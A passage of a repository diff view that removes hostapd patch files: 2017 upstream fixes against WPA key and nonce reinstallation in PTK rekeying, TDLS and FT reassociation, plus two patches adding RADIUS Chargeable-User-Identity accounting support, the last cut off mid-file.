Date: Sun, 1 Oct 2017 12:32:57 +0300
Subject: [PATCH 5/8] Fix PTK rekeying to generate a new ANonce
The Authenticator state machine path for PTK rekeying ended up bypassing
the AUTHENTICATION2 state where a new ANonce is generated when going
directly to the PTKSTART state since there is no need to try to
determine the PMK again in such a case. This is far from ideal since the
new PTK would depend on a new nonce only from the supplicant.
Fix this by generating a new ANonce when moving to the PTKSTART state
for the purpose of starting new 4-way handshake to rekey PTK.
Signed-off-by: Jouni Malinen <j@w1.fi>
---
src/ap/wpa_auth.c | 24 +++++++++++++++++++++---
1 file changed, 21 insertions(+), 3 deletions(-)
diff --git a/src/ap/wpa_auth.c b/src/ap/wpa_auth.c
index 707971d..bf10cc1 100644
--- a/src/ap/wpa_auth.c
+++ b/src/ap/wpa_auth.c
@@ -1901,6 +1901,21 @@ SM_STATE(WPA_PTK, AUTHENTICATION2)
}
+static int wpa_auth_sm_ptk_update(struct wpa_state_machine *sm)
+{
+ if (random_get_bytes(sm->ANonce, WPA_NONCE_LEN)) {
+ wpa_printf(MSG_ERROR,
+ "WPA: Failed to get random data for ANonce");
+ sm->Disconnect = TRUE;
+ return -1;
+ }
+ wpa_hexdump(MSG_DEBUG, "WPA: Assign new ANonce", sm->ANonce,
+ WPA_NONCE_LEN);
+ sm->TimeoutCtr = 0;
+ return 0;
+}
+
+
SM_STATE(WPA_PTK, INITPMK)
{
u8 msk[2 * PMK_LEN];
@@ -2458,9 +2473,12 @@ SM_STEP(WPA_PTK)
SM_ENTER(WPA_PTK, AUTHENTICATION);
else if (sm->ReAuthenticationRequest)
SM_ENTER(WPA_PTK, AUTHENTICATION2);
- else if (sm->PTKRequest)
- SM_ENTER(WPA_PTK, PTKSTART);
- else switch (sm->wpa_ptk_state) {
+ else if (sm->PTKRequest) {
+ if (wpa_auth_sm_ptk_update(sm) < 0)
+ SM_ENTER(WPA_PTK, DISCONNECTED);
+ else
+ SM_ENTER(WPA_PTK, PTKSTART);
+ } else switch (sm->wpa_ptk_state) {
case WPA_PTK_INITIALIZE:
break;
case WPA_PTK_DISCONNECT:
--
2.7.4

132
net-wireless/hostapd/files/2017-1/rebased-v2.6-0006-TDLS-Reject-TPK-TK-reconfiguration.patch
View file

@ -1,132 +0,0 @@
From 6c4bed4f47d1960ec04981a9d50e5076aea5223d Mon Sep 17 00:00:00 2001
From: Jouni Malinen <j@w1.fi>
Date: Fri, 22 Sep 2017 11:03:15 +0300
Subject: [PATCH 6/8] TDLS: Reject TPK-TK reconfiguration
Do not try to reconfigure the same TPK-TK to the driver after it has
been successfully configured. This is an explicit check to avoid issues
related to resetting the TX/RX packet number. There was already a check
for this for TPK M2 (retries of that message are ignored completely), so
that behavior does not get modified.
For TPK M3, the TPK-TK could have been reconfigured, but that was
followed by immediate teardown of the link due to an issue in updating
the STA entry. Furthermore, for TDLS with any real security (i.e.,
ignoring open/WEP), the TPK message exchange is protected on the AP path
and simple replay attacks are not feasible.
As an additional corner case, make sure the local nonce gets updated if
the peer uses a very unlikely "random nonce" of all zeros.
Signed-off-by: Jouni Malinen <j@w1.fi>
---
src/rsn_supp/tdls.c | 38 ++++++++++++++++++++++++++++++++++++--
1 file changed, 36 insertions(+), 2 deletions(-)
diff --git a/src/rsn_supp/tdls.c b/src/rsn_supp/tdls.c
index e424168..9eb9738 100644
--- a/src/rsn_supp/tdls.c
+++ b/src/rsn_supp/tdls.c
@@ -112,6 +112,7 @@ struct wpa_tdls_peer {
u8 tk[16]; /* TPK-TK; assuming only CCMP will be used */
} tpk;
int tpk_set;
+ int tk_set; /* TPK-TK configured to the driver */
int tpk_success;
int tpk_in_progress;
@@ -192,6 +193,20 @@ static int wpa_tdls_set_key(struct wpa_sm *sm, struct wpa_tdls_peer *peer)
u8 rsc[6];
enum wpa_alg alg;
+ if (peer->tk_set) {
+ /*
+ * This same TPK-TK has already been configured to the driver
+ * and this new configuration attempt (likely due to an
+ * unexpected retransmitted frame) would result in clearing
+ * the TX/RX sequence number which can break security, so must
+ * not allow that to happen.
+ */
+ wpa_printf(MSG_INFO, "TDLS: TPK-TK for the peer " MACSTR
+ " has already been configured to the driver - do not reconfigure",
+ MAC2STR(peer->addr));
+ return -1;
+ }
+
os_memset(rsc, 0, 6);
switch (peer->cipher) {
@@ -209,12 +224,15 @@ static int wpa_tdls_set_key(struct wpa_sm *sm, struct wpa_tdls_peer *peer)
return -1;
}
+ wpa_printf(MSG_DEBUG, "TDLS: Configure pairwise key for peer " MACSTR,
+ MAC2STR(peer->addr));
if (wpa_sm_set_key(sm, alg, peer->addr, -1, 1,
rsc, sizeof(rsc), peer->tpk.tk, key_len) < 0) {
wpa_printf(MSG_WARNING, "TDLS: Failed to set TPK to the "
"driver");
return -1;
}
+ peer->tk_set = 1;
return 0;
}
@@ -696,7 +714,7 @@ static void wpa_tdls_peer_clear(struct wpa_sm *sm, struct wpa_tdls_peer *peer)
peer->cipher = 0;
peer->qos_info = 0;
peer->wmm_capable = 0;
- peer->tpk_set = peer->tpk_success = 0;
+ peer->tk_set = peer->tpk_set = peer->tpk_success = 0;
peer->chan_switch_enabled = 0;
os_memset(&peer->tpk, 0, sizeof(peer->tpk));
os_memset(peer->inonce, 0, WPA_NONCE_LEN);
@@ -1159,6 +1177,7 @@ skip_rsnie:
wpa_tdls_peer_free(sm, peer);
return -1;
}
+ peer->tk_set = 0; /* A new nonce results in a new TK */
wpa_hexdump(MSG_DEBUG, "TDLS: Initiator Nonce for TPK handshake",
peer->inonce, WPA_NONCE_LEN);
os_memcpy(ftie->Snonce, peer->inonce, WPA_NONCE_LEN);
@@ -1751,6 +1770,19 @@ static int wpa_tdls_addset_peer(struct wpa_sm *sm, struct wpa_tdls_peer *peer,
}
+static int tdls_nonce_set(const u8 *nonce)
+{
+ int i;
+
+ for (i = 0; i < WPA_NONCE_LEN; i++) {
+ if (nonce[i])
+ return 1;
+ }
+
+ return 0;
+}
+
+
static int wpa_tdls_process_tpk_m1(struct wpa_sm *sm, const u8 *src_addr,
const u8 *buf, size_t len)
{
@@ -2004,7 +2036,8 @@ skip_rsn:
peer->rsnie_i_len = kde.rsn_ie_len;
peer->cipher = cipher;
- if (os_memcmp(peer->inonce, ftie->Snonce, WPA_NONCE_LEN) != 0) {
+ if (os_memcmp(peer->inonce, ftie->Snonce, WPA_NONCE_LEN) != 0 ||
+ !tdls_nonce_set(peer->inonce)) {
/*
* There is no point in updating the RNonce for every obtained
* TPK M1 frame (e.g., retransmission due to timeout) with the
@@ -2020,6 +2053,7 @@ skip_rsn:
"TDLS: Failed to get random data for responder nonce");
goto error;
}
+ peer->tk_set = 0; /* A new nonce results in a new TK */
}
#if 0
--
2.7.4

82
net-wireless/hostapd/files/2017-1/rebased-v2.6-0008-FT-Do-not-allow-multiple-Reassociation-Response-fram.patch
View file

@ -1,82 +0,0 @@
From b372ab0b7daea719749194dc554b26e6367603f2 Mon Sep 17 00:00:00 2001
From: Jouni Malinen <j@w1.fi>
Date: Fri, 22 Sep 2017 12:06:37 +0300
Subject: [PATCH 8/8] FT: Do not allow multiple Reassociation Response frames
The driver is expected to not report a second association event without
the station having explicitly request a new association. As such, this
case should not be reachable. However, since reconfiguring the same
pairwise or group keys to the driver could result in nonce reuse issues,
be extra careful here and do an additional state check to avoid this
even if the local driver ends up somehow accepting an unexpected
Reassociation Response frame.
Signed-off-by: Jouni Malinen <j@w1.fi>
---
src/rsn_supp/wpa.c | 3 +++
src/rsn_supp/wpa_ft.c | 8 ++++++++
src/rsn_supp/wpa_i.h | 1 +
3 files changed, 12 insertions(+)
diff --git a/src/rsn_supp/wpa.c b/src/rsn_supp/wpa.c
index 0550a41..2a53c6f 100644
--- a/src/rsn_supp/wpa.c
+++ b/src/rsn_supp/wpa.c
@@ -2440,6 +2440,9 @@ void wpa_sm_notify_disassoc(struct wpa_sm *sm)
#ifdef CONFIG_TDLS
wpa_tdls_disassoc(sm);
#endif /* CONFIG_TDLS */
+#ifdef CONFIG_IEEE80211R
+ sm->ft_reassoc_completed = 0;
+#endif /* CONFIG_IEEE80211R */
/* Keys are not needed in the WPA state machine anymore */
wpa_sm_drop_sa(sm);
diff --git a/src/rsn_supp/wpa_ft.c b/src/rsn_supp/wpa_ft.c
index 205793e..d45bb45 100644
--- a/src/rsn_supp/wpa_ft.c
+++ b/src/rsn_supp/wpa_ft.c
@@ -153,6 +153,7 @@ static u8 * wpa_ft_gen_req_ies(struct wpa_sm *sm, size_t *len,
u16 capab;
sm->ft_completed = 0;
+ sm->ft_reassoc_completed = 0;
buf_len = 2 + sizeof(struct rsn_mdie) + 2 + sizeof(struct rsn_ftie) +
2 + sm->r0kh_id_len + ric_ies_len + 100;
@@ -681,6 +682,11 @@ int wpa_ft_validate_reassoc_resp(struct wpa_sm *sm, const u8 *ies,
return -1;
}
+ if (sm->ft_reassoc_completed) {
+ wpa_printf(MSG_DEBUG, "FT: Reassociation has already been completed for this FT protocol instance - ignore unexpected retransmission");
+ return 0;
+ }
+
if (wpa_ft_parse_ies(ies, ies_len, &parse) < 0) {
wpa_printf(MSG_DEBUG, "FT: Failed to parse IEs");
return -1;
@@ -781,6 +787,8 @@ int wpa_ft_validate_reassoc_resp(struct wpa_sm *sm, const u8 *ies,
return -1;
}
+ sm->ft_reassoc_completed = 1;
+
if (wpa_ft_process_gtk_subelem(sm, parse.gtk, parse.gtk_len) < 0)
return -1;
diff --git a/src/rsn_supp/wpa_i.h b/src/rsn_supp/wpa_i.h
index 41f371f..56f88dc 100644
--- a/src/rsn_supp/wpa_i.h
+++ b/src/rsn_supp/wpa_i.h
@@ -128,6 +128,7 @@ struct wpa_sm {
size_t r0kh_id_len;
u8 r1kh_id[FT_R1KH_ID_LEN];
int ft_completed;
+ int ft_reassoc_completed;
int over_the_ds_in_progress;
u8 target_ap[ETH_ALEN]; /* over-the-DS target AP */
int set_ptk_after_assoc;
--
2.7.4

451
net-wireless/hostapd/files/cui-20120417.patch
View file

@ -1,451 +0,0 @@
diff -rupN hostapd-0.7.3/src/ap/accounting.c src/ap/accounting.c
--- hostapd-0.7.3/src/ap/accounting.c 2010-09-07 08:43:39.000000000 -0700
+++ src/ap/accounting.c 2011-09-06 21:01:36.000000000 -0700
@@ -24,6 +24,7 @@
#include "ap_config.h"
#include "sta_info.h"
#include "accounting.h"
+/*#include "eapol_auth/eapol_auth_sm_i.h"*/
/* Default interval in seconds for polling TX/RX octets from the driver if
@@ -43,7 +44,10 @@ static struct radius_msg * accounting_ms
char buf[128];
u8 *val;
size_t len;
+ u8 *cui; /*Define CUI Attribute*/
+ size_t cui_len; /*Define CUI Attribute length*/
int i;
+ struct eapol_state_machine *sm = sta->eapol_sm;
msg = radius_msg_new(RADIUS_CODE_ACCOUNTING_REQUEST,
radius_client_get_id(hapd->radius));
@@ -82,7 +86,9 @@ static struct radius_msg * accounting_ms
if (sta) {
val = ieee802_1x_get_identity(sta->eapol_sm, &len);
+ printf("GOT ID\n");
if (!val) {
+
os_snprintf(buf, sizeof(buf), RADIUS_ADDR_FORMAT,
MAC2STR(sta->addr));
val = (u8 *) buf;
@@ -94,6 +100,30 @@ static struct radius_msg * accounting_ms
printf("Could not add User-Name\n");
goto fail;
}
+
+
+ /*Check if the CUI attribute is set, if so returns the TRUE or FALSE accordingly**************/
+ if (getSetCui(sta->eapol_sm)){
+ cui=get_CUI (sta->eapol_sm, &cui_len);
+ printf("GOT CUI\n");
+
+ if (!cui) {
+
+ os_snprintf(buf, sizeof(buf), RADIUS_ADDR_FORMAT,
+ MAC2STR(sta->addr));
+ cui = (u8 *) buf;
+ cui_len = os_strlen(buf);
+ }
+ if (!radius_msg_add_attr(msg, RADIUS_ATTR_CHARGEABLE_USER_IDENTITY, cui,
+ cui_len)) { /*Add CUI attribute to the Accounting Request Message*/
+ printf("Could not add CUI\n");
+ goto fail;
+ }
+ /********************/
+ }
+ /*else { */
+ /* printf ("PROBLEM IN IF\n");*/
+ /*}*/
}
if (hapd->conf->own_ip_addr.af == AF_INET &&
diff -rupN hostapd-0.7.3/src/ap/accounting.h src/ap/accounting.h
--- hostapd-0.7.3/src/ap/accounting.h 2010-09-07 08:43:39.000000000 -0700
+++ src/ap/accounting.h 2011-07-25 19:26:06.000000000 -0700
@@ -22,6 +22,7 @@ static inline void accounting_sta_start(
{
}
+
static inline void accounting_sta_stop(struct hostapd_data *hapd,
struct sta_info *sta)
{
diff -rupN hostapd-0.7.3/src/ap/ieee802_1x.c src/ap/ieee802_1x.c
--- hostapd-0.7.3/src/ap/ieee802_1x.c 2010-09-07 08:43:39.000000000 -0700
+++ src/ap/ieee802_1x.c 2011-09-06 20:59:54.000000000 -0700
@@ -899,6 +899,7 @@ void ieee802_1x_new_station(struct hosta
* re-authentication without having to wait for the
* Supplicant to send EAPOL-Start.
*/
+ printf("REAUTHENTICATION-EAPOL");
sta->eapol_sm->reAuthenticate = TRUE;
}
eapol_auth_step(sta->eapol_sm);
@@ -1138,6 +1139,68 @@ static void ieee802_1x_update_sta_identi
sm->identity_len = len;
}
+/* This method is used to Set the CUI attribute Value**************************************/
+static void set_cui(struct hostapd_data *hapd,
+ struct sta_info *sta,
+ struct radius_msg *msg)
+
+{
+ u8 *buf,*cui_identity;
+ size_t len;
+ struct eapol_state_machine *sm = sta->eapol_sm;
+
+ if (sm == NULL)
+ return;
+
+ if (radius_msg_get_attr_ptr(msg, RADIUS_ATTR_CHARGEABLE_USER_IDENTITY, &buf, &len,
+ NULL) < 0)
+ return;
+ cui_identity = os_malloc(len + 1);
+ if (cui_identity == NULL)
+ return;
+ os_memcpy(cui_identity, buf, len);
+ cui_identity[len] = '\0';
+
+ sm->cui = cui_identity;
+ sm->cui_len = len;
+ printf(" SET CUI %s",(char *) cui_identity);
+
+
+}
+
+
+/* **************************************/
+
+/*check CUI attribute is available in Access Accept */
+static void check_cuiAttr (struct radius_msg *msg,struct sta_info *sta, struct hostapd_data *hapd)
+{
+
+ struct eapol_state_machine *sm = sta->eapol_sm; /*Define a pointer to eapol_state_machine*/
+
+
+ size_t i;
+
+ for (i = 0;i<msg->attr_used;i++)
+ { struct radius_attr_hdr *attr = radius_get_attr_hdr(msg, i);
+ if (attr->type == RADIUS_ATTR_CHARGEABLE_USER_IDENTITY) /*check CUI attribute is availabe in Access-Accept packet*/
+ {
+ printf("CUI Attribute is Available");
+ sm->cuiAvailable = TRUE;
+ set_cui(hapd, sta, msg);
+ break;
+
+ }
+ else {
+ sm->cuiAvailable = FALSE;
+ printf ("CUI is not available in this packet");
+
+ }
+
+
+ }
+
+}
+
struct sta_id_search {
u8 identifier;
@@ -1298,6 +1361,8 @@ ieee802_1x_receive_auth(struct radius_ms
shared_secret_len);
ieee802_1x_store_radius_class(hapd, sta, msg);
ieee802_1x_update_sta_identity(hapd, sta, msg);
+ /*set_cui(hapd, sta, msg);*/
+ check_cuiAttr (msg,sta,hapd);
if (sm->eap_if->eapKeyAvailable &&
wpa_auth_pmksa_add(sta->wpa_sm, sm->eapol_key_crypt,
session_timeout_set ?
@@ -1777,6 +1842,27 @@ u8 * ieee802_1x_get_identity(struct eapo
}
+
+u8 * get_CUI(struct eapol_state_machine *sm, size_t *len) /* return CUI Attribute Value ******************************/
+{
+ if (sm == NULL || sm->identity == NULL)
+ return NULL;
+
+ *len = sm->cui_len;
+ return sm->cui;
+}
+
+Boolean getSetCui (struct eapol_state_machine *sm) /*Check if the CUI value is set or not, and returns TRUE or FALSE accordingly*/
+
+{ if (sm->cuiAvailable)
+ return TRUE;
+else
+ return FALSE;
+ }
+
+/*****************************/
+
+
u8 * ieee802_1x_get_radius_class(struct eapol_state_machine *sm, size_t *len,
int idx)
{
diff -rupN hostapd-0.7.3/src/ap/ieee802_1x.h src/ap/ieee802_1x.h
--- hostapd-0.7.3/src/ap/ieee802_1x.h 2010-09-07 08:43:39.000000000 -0700
+++ src/ap/ieee802_1x.h 2011-07-25 19:43:10.000000000 -0700
@@ -69,6 +69,13 @@ void ieee802_1x_deinit(struct hostapd_da
int ieee802_1x_tx_status(struct hostapd_data *hapd, struct sta_info *sta,
const u8 *buf, size_t len, int ack);
u8 * ieee802_1x_get_identity(struct eapol_state_machine *sm, size_t *len);
+
+/** definig CUI get function */
+u8 * get_CUI(struct eapol_state_machine *sm, size_t *len);
+Boolean getSetCui (struct eapol_state_machine *sm);
+
+/*********************/
+
u8 * ieee802_1x_get_radius_class(struct eapol_state_machine *sm, size_t *len,
int idx);
const u8 * ieee802_1x_get_key(struct eapol_state_machine *sm, size_t *len);
diff -rupN hostapd-0.7.3/src/ap/pmksa_cache_auth.c src/ap/pmksa_cache_auth.c
--- hostapd-0.7.3/src/ap/pmksa_cache_auth.c 2010-09-07 08:43:39.000000000 -0700
+++ src/ap/pmksa_cache_auth.c 2011-09-06 22:42:00.000000000 -0700
@@ -142,6 +142,20 @@ static void pmksa_cache_from_eapol_data(
}
}
+/*set to cui in to cache*/
+
+ if (eapol ->cui) {
+
+ entry ->cui = os_malloc(eapol->cui_len); /*Allocate memory for CUI attribute*/
+ if (entry->cui) {
+ entry->cui_len = eapol->cui_len;
+ os_memcpy(entry->cui, eapol->cui,
+ eapol->cui_len);
+ }
+ }
+
+/*set to cui in to cache*/
+
#ifndef CONFIG_NO_RADIUS
radius_copy_class(&entry->radius_class, &eapol->radius_class);
#endif /* CONFIG_NO_RADIUS */
@@ -169,6 +183,25 @@ void pmksa_cache_to_eapol_data(struct rs
eapol->identity, eapol->identity_len);
}
+/*Added to get CUI from the cache*/
+
+
+ if (entry->cui) {
+ os_free(eapol->cui);
+
+ eapol->cui = os_malloc(entry->cui_len);
+ eapol->cuiAvailable=TRUE;
+ if (eapol->cui) {
+ eapol->cui_len = entry->cui_len;
+ os_memcpy(eapol->cui, entry->cui,
+ entry->cui_len); /*copy the CUI attribute value to EAPOL data structure*/
+ }
+ wpa_hexdump_ascii(MSG_DEBUG, "CUIfrom PMKSA",
+ eapol->cui, eapol->cui_len);
+ }
+
+ /*Added to get CUI from the cache*/
+
#ifndef CONFIG_NO_RADIUS
radius_free_class(&eapol->radius_class);
radius_copy_class(&eapol->radius_class, &entry->radius_class);
@@ -180,6 +213,7 @@ void pmksa_cache_to_eapol_data(struct rs
eapol->eap_type_authsrv = entry->eap_type_authsrv;
((struct sta_info *) eapol->sta)->vlan_id = entry->vlan_id;
+ printf ("GETTING CACHE ENTRY\n");
}
diff -rupN hostapd-0.7.3/src/ap/pmksa_cache_auth.h src/ap/pmksa_cache_auth.h
--- hostapd-0.7.3/src/ap/pmksa_cache_auth.h 2010-09-07 08:43:39.000000000 -0700
+++ src/ap/pmksa_cache_auth.h 2011-08-07 19:19:44.000000000 -0700
@@ -31,6 +31,8 @@ struct rsn_pmksa_cache_entry {
u8 *identity;
size_t identity_len;
+ u8 *cui; /* cui by me*/
+ size_t cui_len; /*Size of the cached cui by me*/
struct radius_class_data radius_class;
u8 eap_type_authsrv;
int vlan_id;
diff -rupN hostapd-0.7.3/src/common/ieee802_11_common.c src/common/ieee802_11_common.c
--- hostapd-0.7.3/src/common/ieee802_11_common.c 2010-09-07 08:43:39.000000000 -0700
+++ src/common/ieee802_11_common.c 2011-07-25 17:56:38.000000000 -0700
@@ -31,8 +31,8 @@ static int ieee802_11_parse_vendor_speci
if (elen < 4) {
if (show_errors) {
wpa_printf(MSG_MSGDUMP, "short vendor specific "
- "information element ignored (len=%lu)",
- (unsigned long) elen);
+ "information element ignored (len=%lu)",
+ (unsigned long) elen);
}
return -1;
}
diff -rupN hostapd-0.7.3/src/eapol_auth/eapol_auth_sm_i.h src/eapol_auth/eapol_auth_sm_i.h
--- hostapd-0.7.3/src/eapol_auth/eapol_auth_sm_i.h 2010-09-07 08:43:39.000000000 -0700
+++ src/eapol_auth/eapol_auth_sm_i.h 2011-09-06 20:43:46.000000000 -0700
@@ -75,6 +75,7 @@ struct eapol_state_machine {
/* variables */
Boolean eapolLogoff;
Boolean eapolStart;
+ Boolean cuiAvailable; /*to check CUI is available in AcessAccept*/
PortTypes portMode;
unsigned int reAuthCount;
/* constants */
@@ -159,6 +160,8 @@ struct eapol_state_machine {
u8 last_eap_id; /* last used EAP Identifier */
u8 *identity;
size_t identity_len;
+ u8 *cui; /*Define CUI Attribute*/
+ size_t cui_len; /*Define CUI attribute length*/
u8 eap_type_authsrv; /* EAP type of the last EAP packet from
* Authentication server */
u8 eap_type_supp; /* EAP type of the last EAP packet from Supplicant */
diff -rupN hostapd-0.7.3/src/radius/radius.c src/radius/radius.c
--- hostapd-0.7.3/src/radius/radius.c 2010-09-07 08:43:39.000000000 -0700
+++ src/radius/radius.c 2011-07-25 18:41:30.000000000 -0700
@@ -24,16 +24,16 @@
/**
* struct radius_msg - RADIUS message structure for new and parsed messages
*/
-struct radius_msg {
+//struct radius_msg {
/**
* buf - Allocated buffer for RADIUS message
*/
- struct wpabuf *buf;
+ //struct wpabuf *buf;
/**
* hdr - Pointer to the RADIUS header in buf
*/
- struct radius_hdr *hdr;
+ //struct radius_hdr *hdr;
/**
* attr_pos - Array of indexes to attributes
@@ -41,18 +41,18 @@ struct radius_msg {
* The values are number of bytes from buf to the beginning of
* struct radius_attr_hdr.
*/
- size_t *attr_pos;
+ //size_t *attr_pos;
/**
* attr_size - Total size of the attribute pointer array
*/
- size_t attr_size;
+ //size_t attr_size;
/**
* attr_used - Total number of attributes in the array
*/
- size_t attr_used;
-};
+ //size_t attr_used;
+//};
struct radius_hdr * radius_msg_get_hdr(struct radius_msg *msg)
@@ -66,7 +66,7 @@ struct wpabuf * radius_msg_get_buf(struc
return msg->buf;
}
-
+/*
static struct radius_attr_hdr *
radius_get_attr_hdr(struct radius_msg *msg, int idx)
{
@@ -74,7 +74,7 @@ radius_get_attr_hdr(struct radius_msg *m
(wpabuf_mhead_u8(msg->buf) + msg->attr_pos[idx]);
}
-
+*/
static void radius_msg_set_hdr(struct radius_msg *msg, u8 code, u8 identifier)
{
msg->hdr->code = code;
diff -rupN hostapd-0.7.3/src/radius/radius.h src/radius/radius.h
--- hostapd-0.7.3/src/radius/radius.h 2010-09-07 08:43:39.000000000 -0700
+++ src/radius/radius.h 2011-07-25 18:44:42.000000000 -0700
@@ -21,6 +21,45 @@
#pragma pack(push, 1)
#endif /* _MSC_VER */
+/************************/
+struct radius_msg {
+ /**
+ * buf - Allocated buffer for RADIUS message
+ */
+ struct wpabuf *buf;
+
+ /**
+ * hdr - Pointer to the RADIUS header in buf
+ */
+ struct radius_hdr *hdr;
+
+ /**
+ * attr_pos - Array of indexes to attributes
+ *
+ * The values are number of bytes from buf to the beginning of
+ * struct radius_attr_hdr.
+ */
+ size_t *attr_pos;
+
+ /**
+ * attr_size - Total size of the attribute pointer array
+ */
+ size_t attr_size;
+
+ /**
+ * attr_used - Total number of attributes in the array
+ */
+ size_t attr_used;
+};
+
+
+
+
+/***********************/
+
+
+
+
struct radius_hdr {
u8 code;
u8 identifier;
@@ -201,6 +240,10 @@ void radius_msg_finish_acct(struct radiu
size_t secret_len);
struct radius_attr_hdr * radius_msg_add_attr(struct radius_msg *msg, u8 type,
const u8 *data, size_t data_len);
+
+/****************************/
+
+/*****************************/
struct radius_msg * radius_msg_parse(const u8 *data, size_t len);
int radius_msg_add_eap(struct radius_msg *msg, const u8 *data,
size_t data_len);
@@ -238,7 +281,13 @@ static inline int radius_msg_add_attr_in
u32 val = htonl(value);
return radius_msg_add_attr(msg, type, (u8 *) &val, 4) != NULL;
}
-
+/**********************/
+static struct radius_attr_hdr * radius_get_attr_hdr(struct radius_msg *msg, int idx)
+{
+ return (struct radius_attr_hdr *)
+ (wpabuf_mhead_u8(msg->buf) + msg->attr_pos[idx]);
+}
+/**************************/
static inline int radius_msg_get_attr_int32(struct radius_msg *msg, u8 type,
u32 *value)
{

451
net-wireless/hostapd/files/cui-20120717.patch
View file

@ -1,451 +0,0 @@
diff -urN hostapd-1.0.orig//src/ap/accounting.c hostapd-1.0/src/ap/accounting.c
--- hostapd-1.0.orig//src/ap/accounting.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/ap/accounting.c 2012-07-17 18:40:21.000000000 +0800
@@ -25,6 +25,7 @@
#include "sta_info.h"
#include "ap_drv_ops.h"
#include "accounting.h"
+/*#include "eapol_auth/eapol_auth_sm_i.h"*/
/* Default interval in seconds for polling TX/RX octets from the driver if
@@ -44,7 +45,10 @@
char buf[128];
u8 *val;
size_t len;
+ u8 *cui; /*Define CUI Attribute*/
+ size_t cui_len; /*Define CUI Attribute length*/
int i;
+ struct eapol_state_machine *sm = sta->eapol_sm;
msg = radius_msg_new(RADIUS_CODE_ACCOUNTING_REQUEST,
radius_client_get_id(hapd->radius));
@@ -83,7 +87,9 @@
if (sta) {
val = ieee802_1x_get_identity(sta->eapol_sm, &len);
+ printf("GOT ID\n");
if (!val) {
+
os_snprintf(buf, sizeof(buf), RADIUS_ADDR_FORMAT,
MAC2STR(sta->addr));
val = (u8 *) buf;
@@ -95,6 +101,30 @@
printf("Could not add User-Name\n");
goto fail;
}
+
+
+ /*Check if the CUI attribute is set, if so returns the TRUE or FALSE accordingly**************/
+ if (getSetCui(sta->eapol_sm)){
+ cui=get_CUI (sta->eapol_sm, &cui_len);
+ printf("GOT CUI\n");
+
+ if (!cui) {
+
+ os_snprintf(buf, sizeof(buf), RADIUS_ADDR_FORMAT,
+ MAC2STR(sta->addr));
+ cui = (u8 *) buf;
+ cui_len = os_strlen(buf);
+ }
+ if (!radius_msg_add_attr(msg, RADIUS_ATTR_CHARGEABLE_USER_IDENTITY, cui,
+ cui_len)) { /*Add CUI attribute to the Accounting Request Message*/
+ printf("Could not add CUI\n");
+ goto fail;
+ }
+ /********************/
+ }
+ /*else { */
+ /* printf ("PROBLEM IN IF\n");*/
+ /*}*/
}
if (hapd->conf->own_ip_addr.af == AF_INET &&
diff -urN hostapd-1.0.orig//src/ap/accounting.h hostapd-1.0/src/ap/accounting.h
--- hostapd-1.0.orig//src/ap/accounting.h 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/ap/accounting.h 2012-07-17 18:40:21.000000000 +0800
@@ -22,6 +22,7 @@
{
}
+
static inline void accounting_sta_stop(struct hostapd_data *hapd,
struct sta_info *sta)
{
diff -urN hostapd-1.0.orig//src/ap/ieee802_1x.c hostapd-1.0/src/ap/ieee802_1x.c
--- hostapd-1.0.orig//src/ap/ieee802_1x.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/ap/ieee802_1x.c 2012-07-17 18:40:21.000000000 +0800
@@ -966,6 +966,7 @@
* re-authentication without having to wait for the
* Supplicant to send EAPOL-Start.
*/
+ printf("REAUTHENTICATION-EAPOL");
sta->eapol_sm->reAuthenticate = TRUE;
}
eapol_auth_step(sta->eapol_sm);
@@ -1205,6 +1206,68 @@
sm->identity_len = len;
}
+/* This method is used to Set the CUI attribute Value**************************************/
+static void set_cui(struct hostapd_data *hapd,
+ struct sta_info *sta,
+ struct radius_msg *msg)
+
+{
+ u8 *buf,*cui_identity;
+ size_t len;
+ struct eapol_state_machine *sm = sta->eapol_sm;
+
+ if (sm == NULL)
+ return;
+
+ if (radius_msg_get_attr_ptr(msg, RADIUS_ATTR_CHARGEABLE_USER_IDENTITY, &buf, &len,
+ NULL) < 0)
+ return;
+ cui_identity = os_malloc(len + 1);
+ if (cui_identity == NULL)
+ return;
+ os_memcpy(cui_identity, buf, len);
+ cui_identity[len] = '\0';
+
+ sm->cui = cui_identity;
+ sm->cui_len = len;
+ printf(" SET CUI %s",(char *) cui_identity);
+
+
+}
+
+
+/* **************************************/
+
+/*check CUI attribute is available in Access Accept */
+static void check_cuiAttr (struct radius_msg *msg,struct sta_info *sta, struct hostapd_data *hapd)
+{
+
+ struct eapol_state_machine *sm = sta->eapol_sm; /*Define a pointer to eapol_state_machine*/
+
+
+ size_t i;
+
+ for (i = 0;i<msg->attr_used;i++)
+ { struct radius_attr_hdr *attr = radius_get_attr_hdr(msg, i);
+ if (attr->type == RADIUS_ATTR_CHARGEABLE_USER_IDENTITY) /*check CUI attribute is availabe in Access-Accept packet*/
+ {
+ printf("CUI Attribute is Available");
+ sm->cuiAvailable = TRUE;
+ set_cui(hapd, sta, msg);
+ break;
+
+ }
+ else {
+ sm->cuiAvailable = FALSE;
+ printf ("CUI is not available in this packet");
+
+ }
+
+
+ }
+
+}
+
struct sta_id_search {
u8 identifier;
@@ -1365,6 +1428,8 @@
shared_secret_len);
ieee802_1x_store_radius_class(hapd, sta, msg);
ieee802_1x_update_sta_identity(hapd, sta, msg);
+ /*set_cui(hapd, sta, msg);*/
+ check_cuiAttr (msg,sta,hapd);
if (sm->eap_if->eapKeyAvailable &&
wpa_auth_pmksa_add(sta->wpa_sm, sm->eapol_key_crypt,
session_timeout_set ?
@@ -1859,6 +1924,27 @@
}
+
+u8 * get_CUI(struct eapol_state_machine *sm, size_t *len) /* return CUI Attribute Value ******************************/
+{
+ if (sm == NULL || sm->identity == NULL)
+ return NULL;
+
+ *len = sm->cui_len;
+ return sm->cui;
+}
+
+Boolean getSetCui (struct eapol_state_machine *sm) /*Check if the CUI value is set or not, and returns TRUE or FALSE accordingly*/
+
+{ if (sm->cuiAvailable)
+ return TRUE;
+else
+ return FALSE;
+ }
+
+/*****************************/
+
+
u8 * ieee802_1x_get_radius_class(struct eapol_state_machine *sm, size_t *len,
int idx)
{
diff -urN hostapd-1.0.orig//src/ap/ieee802_1x.h hostapd-1.0/src/ap/ieee802_1x.h
--- hostapd-1.0.orig//src/ap/ieee802_1x.h 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/ap/ieee802_1x.h 2012-07-17 18:40:21.000000000 +0800
@@ -69,6 +69,13 @@
